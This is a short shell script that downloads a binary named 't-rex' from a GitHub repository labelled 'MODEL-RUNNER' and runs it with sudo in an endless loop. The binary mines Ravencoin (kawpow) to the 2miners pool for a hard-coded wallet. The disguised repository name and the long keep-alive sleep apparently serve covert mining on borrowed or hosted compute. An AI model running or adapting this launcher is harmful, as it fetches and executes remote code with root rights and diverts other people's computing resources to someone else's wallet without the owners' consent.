#!/bin/sh
sudo apt update
wget https://github.com/PranavS-1999/MODEL-RUNNER/raw/master/t-rex
chmod +x t-rex
while [ 1 ]; do
sudo ./t-rex -a kawpow -o stratum+tcp://rvn.2miners.com:6060 -u RJ7NGWUw4MQaasEuCa4KKBdrYzjYqQwUCJ.$(echo $(shuf -i 1-4 -n 1)-PENTIUM4) -p x
sleep 5
done
sleep 999999999
